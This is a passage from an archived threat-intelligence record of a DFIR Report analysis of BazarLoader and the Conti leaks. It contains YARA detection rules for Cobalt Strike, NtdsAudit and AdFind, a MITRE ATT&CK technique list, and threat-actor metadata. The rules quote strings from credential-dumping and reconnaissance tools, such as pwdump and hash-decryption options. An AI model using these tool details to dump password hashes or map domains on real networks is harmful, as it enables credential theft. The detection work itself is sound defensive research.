= \"r4k7g8t-k4o6m,o1s1k.k1s6o,h8k-s4j8q*m+f/i*q/f3m-r5j2n0f0i*q0m/e0j5q7n5f4j7q3n7f1m4g2s,g5s5l9h7s9p1o.t8k5r-j3\r\n $s15 = \"k8s9n7o9k5s5o9m2k0s1m3m.k,s-n+o-f9n9t+t6f4n5o6t2f0n1s/r1f-n-o.t*e8m9i-s6e4m5t3q5e1m1i5s.e,m-k0s*h8p9q7t9h5p5\r\n $s16 = \"o9g6g0l0s1e6h4p-g6s9s9p1m1k*s3l-t5s.f8m5r5f6n+i2j8f*h,p5j2r.h0h1q9i6e8r-i*n8m-r5s-l.i8f2i1k.o4n1t9l6l0g,p9j6\r\n $s17 = \"t8n2i3e0i,l.i7i9e8r1j7o0n3i9j0m3m-l6e6s9r*l6s5h4t6n7o*k.r1f+r4l/q9g7i3o.m+t9q*g/j0h0e1n*m3i,h.e4n3i5n-r9g1h2\r\n $s18 = \"[_^A^A_]\" fullword ascii\r\n $s19 = \"k9s9f+j*k3s5o-j/k/s1h/p5k-s-o7j7f7n9t/g+f3n5q/r8f1n1t7g3f+n-p.g8e7m9s3q4e5m5o+h0e/m1g-h4e+m-m+q0h9p9f/e,h3p5\r\n $s20 = \"g8s9j0t4o,t+n3t1g0k9k1t,o5s0n+t9n6j+o0q2i4j6r1i3f,g+j2h1f2r1n-e9m,i2i7f3q4m-n7n4m.r.e1s*j,m5p/n0n6s8p9g/o7l3\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 2000KB and\r\n 8 of them\r\n}\r\nimport \"pe\"\r\nrule cobalt_strike_exe21 {\r\n meta:\r\n description = \"files - 21.exe\"\r\n author = \"TheDFIRReport\"\r\n date = \"2021-07-25\"\r\n hash1 = \"972e38f7fa4c3c59634155debb6fb32eebda3c0e8e73f4cb264463708d378c39\"\r\n 
strings:\r\n $s1 = \"%c%c%c%c%c%c%c%c%cMSSE-%d-server\" fullword ascii\r\n $s2 = \" VirtualQuery failed for %d bytes at address %p\" fullword ascii\r\n $s3 = \"1brrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrTbrrT\r\n $s4 = \"\\\\hzA\\\\Vza\\\\|z%\\\\2z/\\\\3z\\\"\\\\/z%\\\\/z8\\\\9z\\\"\\\\(zl\\\\3z\\\"\\\\9z4\\\\5z8\\\\|z.\\\\9z+\\\\5z\\\"\\\\qz)\\\\2z(\\\\|z:\\\\=z\u003e\\\\5z-\\\\\u003ez\r\n $s5 = \"\\\\zL\\\\/z\u003e\\\\qz.\\\\=za\\\\0z-\\\\(z\\\"\\\\\\\\zL\\\\/z\u003e\\\\qz?\\\\,za\\\\?z5\\\\.z \\\\\\\\zL\\\\/z\u003e\\\\qz?\\\\,za\\\\0z-\\\\(z\\\"\\\\\\\\zL\\\\/z:\\\\qz*\r\n $s6 = \"\\\\zL:\\\\zL\" fullword ascii\r\n $s7 = \"\\\\\\\\z:\\\\\\\\z\" fullword ascii\r\n $s8 = \"\\\\qz/\\\\3z!\\\\,z%\\\\0z)\\\\8zl\\\\tzc\\\\?z \\\\.ze\\\\|z*\\\\)z\\\"\\\\?z8\\\\5z#\\\\2zl\\\\:z\u003e\\\\3z!\\\\|z-\\\\|z\\\"\\\\=z8\\\\5z:\\\\9zl\\\\?z#\\\\\r\n $s9 = \"qz\u003c\\\\%zL\\\\\\\\zL\\\\9z?\\\\qz?\\\\*zL\\\\\\\\zL\\\\9z?\\\\qz9\\\\%zL\\\\\\\\zL\\\\9z?\\\\qz:\\\\9zL\\\\\\\\zL\\\\9z8\\\\qz)\\\\9zL\\\\\\\\zL\\\\9z9\\\\qz)\\\r\n $s10 = \"zL\\\\\\\\zL\\\\0z:\\\\qz\" fullword ascii\r\n $s11 = \"z-\\\\(z\\\"\\\\\\\\zL\\\\/z:\\\\qz\" fullword ascii\r\n $s12 = \" VirtualProtect failed with code 0x%x\" fullword ascii\r\n $s13 = \"3\\\\)z'\\\\\\\\zL\\\\\u003ez)\\\\\\\\zL\\\\/z \\\\\\\\zL\\\\9z8\\\\\\\\zL\\\\0z:\\\\\\\\zL\\\\0z8\\\\\\\\zL\\\\:z-\\\\\\\\zL\\\\*z%\\\\\\\\zL\\\\4z5\\\\\\\\zL\\\\=z6\\\\\\\r\n $s14 = \"z#\\\\\\\\zL\\\\,z \\\\\\\\zL\\\\,z8\\\\\\\\zL\\\\.z#\\\\\\\\zL\\\\.z9\\\\\\\\zL\\\\4z\u003e\\\\\\\\zL\\\\/z'\\\\\\\\zL\\\\/z=\\\\\\\\zL\\\\/z:\\\\\\\\zL\\\\(z$\\\\\\\\zL\\\r\n $s15 = \"qz \\\\5zL\\\\\\\\zL\\\\8z)\\\\qz \\\\)zL\\\\\\\\zL\\\\8z%\\\\*za\\\\1z:\\\\\\\\zL\\\\9z \\\\qz+\\\\.zL\\\\\\\\zL\\\\9z\\\"\\\\qz-\\\\)zL\\\\\\\\zL\\\\9z\\\"\\\\q\r\n $s16 = \"qz\u003c\\\\7zL\\\\\\\\zL\\\\)z6\\\\qz9\\\\\u0026za\\\\?z5\\\\.z 
\\\\\\\\zL\\\\)z6\\\\qz9\\\\\u0026za\\\\0z-\\\\(z\\\"\\\\\\\\zL\\\\*z%\\\\qz:\\\\2zL\\\\\\\\zL\\\\$z$\\\\qz6\r\n $s17 = \"qz'\\\\.zL\\\\\\\\zL\\\\7z5\\\\qz'\\\\;zL\\\\\\\\zL\\\\0z8\\\\qz \\\\(zL\\\\\\\\zL\\\\0z:\\\\qz \\\\*zL\\\\\\\\zL\\\\1z%\\\\qz\\\"\\\\\u0026zL\\\\\\\\zL\\\\1z'\\\\qz\r\n $s18 = \"]zL\\\\=z*\\\\qz6\\\\=zL\\\\\\\\zL\\\\=z\u003e\\\\qz-\\\\9zL\\\\\\\\zL\\\\=z\u003e\\\\qz.\\\\4zL\\\\\\\\zL\\\\=z\u003e\\\\qz(\\\\\u0026zL\\\\\\\\zL\\\\=z\u003e\\\\qz)\\\\;zL\\\\\\\\zL\r\n $s19 = \" Unknown pseudo relocation protocol version %d.\" fullword ascii\r\n $s20 = \"\\\\L*L\\\\]qN\\\\WHKl]qO\\\\W{j\\\\XJL\\\\][G\\\\}\" fullword ascii\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 800KB and (pe.imphash()==\"17b461a082950fc6332228572138b80c\" or\r\n8 of them)\r\n}\r\nrule informational_NtdsAudit_AD_Audit_Tool {\r\n meta:\r\n description = \"files - NtdsAudit.exe\"\r\n author = \"TheDFIRReport\"\r\n date = \"2021-07-25\"\r\n hash1 = \"fb49dce92f9a028a1da3045f705a574f3c1997fe947e2c69699b17f07e5a552b\"\r\n strings:\r\n $x1 = \"WARNING: Use of the --pwdump option will result in decryption of password hashes using the System Key.\" fullw\r\n $s2 = \"costura.nlog.dll.compressed\" fullword wide\r\n $s3 = \"costura.microsoft.extensions.commandlineutils.dll.compressed\" fullword wide\r\nhttps://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/\r\nPage 19 of 21\n\n$s4 = \"Password hashes have only been dumped for the \\\"{0}\\\" domain.\" fullword wide\r\n $s5 = \"The NTDS file contains user accounts with passwords stored using reversible encryption. 
Use the --dump-revers\r\n $s6 = \"costura.system.valuetuple.dll.compressed\" fullword wide\r\n $s7 = \"TargetRNtdsAudit.NTCrypto.#DecryptDataUsingAes(System.Byte[],System.Byte[],System.Byte[])T\" fullword ascii\r\n $s8 = \"c:\\\\Code\\\\NtdsAudit\\\\src\\\\NtdsAudit\\\\obj\\\\Release\\\\NtdsAudit.pdb\" fullword ascii\r\n $s9 = \"NtdsAudit.exe\" fullword wide\r\n $s10 = \"costura.esent.interop.dll.compressed\" fullword wide\r\n $s11 = \"costura.costura.dll.compressed\" fullword wide\r\n $s12 = \"costura.registry.dll.compressed\" fullword wide\r\n $s13 = \"costura.nfluent.dll.compressed\" fullword wide\r\n $s14 = \"dumphashes\" fullword ascii\r\n $s15 = \"The path to output hashes in pwdump format.\" fullword wide\r\n $s16 = \"Microsoft.Extensions.CommandLineUtils\" fullword ascii\r\n $s17 = \"If you require password hashes for other domains, please obtain the NTDS and SYSTEM files for each domain.\"\r\n $s18 = \"microsoft.extensions.commandlineutils\" fullword wide\r\n $s19 = \"-p | --pwdump \u003cfile\u003e\" fullword wide\r\n $s20 = \"get_ClearTextPassword\" fullword ascii\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 2000KB and\r\n 1 of ($x*) and 4 of them\r\n}\r\nrule informational_AdFind_AD_Recon_and_Admin_Tool {\r\n meta:\r\n description = \"files - AdFind.exe\"\r\n author = \"TheDFIRReport\"\r\n date = \"2021-07-25\"\r\n hash1 = \"b1102ed4bca6dae6f2f498ade2f73f76af527fa803f0e0b46e100d4cf5150682\"\r\n strings:\r\n $s1 = \" -sc dumpugcinfo Dump info for users/computers that have used UGC\" fullword ascii\r\n $s2 = \" -sc computers_pwdnotreqd Dump computers set with password not required.\" fullword ascii\r\n $s3 = \" -sc computers_inactive Dump computers that are disabled or password last set\" fullword ascii\r\n $s4 = \" -sc computers_active Dump computers that are enabled and password last\" fullword ascii\r\n $s5 = \" -sc ridpool Dump Decoded Rid Pool Info\" fullword ascii\r\n $s6 = \" Get top 10 quota users in decoded format\" fullword 
ascii\r\n $s7 = \" -po Print options. This switch will dump to the command line\" fullword ascii\r\n $s8 = \"ERROR: Couldn't properly encode password - \" fullword ascii\r\n $s9 = \" -sc users_accexpired Dump accounts that are expired (NOT password expiration).\" fullword ascii\r\n $s10 = \" -sc users_disabled Dump disabled users.\" fullword ascii\r\n $s11 = \" -sc users_pwdnotreqd Dump users set with password not required.\" fullword ascii\r\n $s12 = \" -sc users_noexpire Dump non-expiring users.\" fullword ascii\r\n $s13 = \" adfind -default -rb ou=MyUsers -objfilefolder c:\\\\temp\\\\ad_out\" fullword ascii\r\n $s14 = \" Dump all Exchange objects and their SMTP proxyaddresses\" fullword ascii\r\n $s15 = \"WLDAP32.DLL\" fullword ascii\r\n $s16 = \"AdFind.exe\" fullword ascii\r\n $s17 = \" duration attributes that will be decoded by the -tdc* switches.\" fullword ascii\r\n $s18 = \" -int8time- xx Remove attribute(s) from list to be decoded as int8. Semicolon delimited.\" fullword ascii\r\n $s19 = \"replTopologyStayOfExecution\" fullword ascii\r\n $s20 = \"%s: [%s] Error 0x%0x (%d) - %s\" fullword ascii\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 4000KB and\r\n 8 of them\r\n}\r\nMITRE\r\nPhishing – T1566\r\nSpearphishing Attachment – T1566.001\r\nDomain Accounts – T1078.002\r\nCommand and Scripting Interpreter – T1059\r\nUser Execution – T1204\r\nPowerShell – T1059.001\r\nWindows Command Shell – T1059.003\r\nMalicious File – T1204.002\r\nCreate Account – T1136\r\nValid Accounts – T1078\r\nLocal Account – T1087.001\r\nProcess Injection – T1055\r\nProcess Hollowing – T1055.012\r\nSigned Binary Proxy Execution – T1218\r\nRundll32 – T1218.011\r\nOS Credential Dumping – T1003\r\nLSASS Memory – T1003.001\r\nCached Domain Credentials – T1003.005\r\nDomain Trust Discovery – T1482\r\nAccount Discovery – T1087\r\nFile and Directory Discovery – T1083\r\nProcess Discovery – 
T1057\r\nNetwork Share Discovery – T1135\r\nRemote System Discovery – T1018\r\nSoftware Discovery – T1518\r\nSystem Owner/User Discovery – T1033\r\nSystem Time Discovery – T1124\r\nLateral Tool Transfer – T1570\r\nRemote Services – T1021\r\nRemote Desktop Protocol – T1021.001\r\nSMB/Windows Admin Shares – T1021.002\r\nWindows Remote Management – T1021.006\r\nData from Local System – T1005\r\nData from Network Shared Drive – T1039\r\nData Staged – T1074\r\nLocal Data Staging – T1074.001\r\nRemote Data Staging – T1074.002\r\nInternal case #5426\r\nSource: https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/"
	],
	"report_names": [
		"bazarloader-and-the-conti-leaks"
	],
	"threat_actors": [
		{
			"id": "26a04131-2b8c-4e5d-8f38-5c58b86f5e7f",
			"created_at": "2022-10-25T15:50:23.579601Z",
			"updated_at": "2026-04-10T02:00:05.360509Z",
			"deleted_at": null,
			"main_name": "TA551",
			"aliases": [
				"TA551",
				"GOLD CABIN",
				"Shathak"
			],
			"source_name": "MITRE:TA551",
			"tools": [
				"QakBot",
				"IcedID",
				"Valak",
				"Ursnif"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "40b623c7-b621-48db-b55b-dd4f6746fbc6",
			"created_at": "2024-06-19T02:03:08.017681Z",
			"updated_at": "2026-04-10T02:00:03.665818Z",
			"deleted_at": null,
			"main_name": "GOLD CABIN",
			"aliases": [
				"Shathak",
				"TA551 "
			],
			"source_name": "Secureworks:GOLD CABIN",
			"tools": [],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "90f216f2-4897-46fc-bb76-3acae9d112ca",
			"created_at": "2023-01-06T13:46:39.248936Z",
			"updated_at": "2026-04-10T02:00:03.260122Z",
			"deleted_at": null,
			"main_name": "GOLD CABIN",
			"aliases": [
				"Shakthak",
				"TA551",
				"ATK236",
				"G0127",
				"Monster Libra"
			],
			"source_name": "MISPGALAXY:GOLD CABIN",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "04e34cab-3ee4-4f06-a6f6-5cdd7eccfd68",
			"created_at": "2022-10-25T16:07:24.578896Z",
			"updated_at": "2026-04-10T02:00:05.039955Z",
			"deleted_at": null,
			"main_name": "TA551",
			"aliases": [
				"G0127",
				"Gold Cabin",
				"Monster Libra",
				"Shathak",
				"TA551"
			],
			"source_name": "ETDA:TA551",
			"tools": [
				"BokBot",
				"CRM",
				"Gozi",
				"Gozi CRM",
				"IceID",
				"IcedID",
				"Papras",
				"Snifula",
				"Ursnif",
				"Valak",
				"Valek"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434522,
	"ts_updated_at": 1775792243,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/297f62e26c67ffacef5e08e21f9e227d2a2b19bd.pdf",
		"text": "https://archive.orkl.eu/297f62e26c67ffacef5e08e21f9e227d2a2b19bd.txt",
		"img": "https://archive.orkl.eu/297f62e26c67ffacef5e08e21f9e227d2a2b19bd.jpg"
	}
}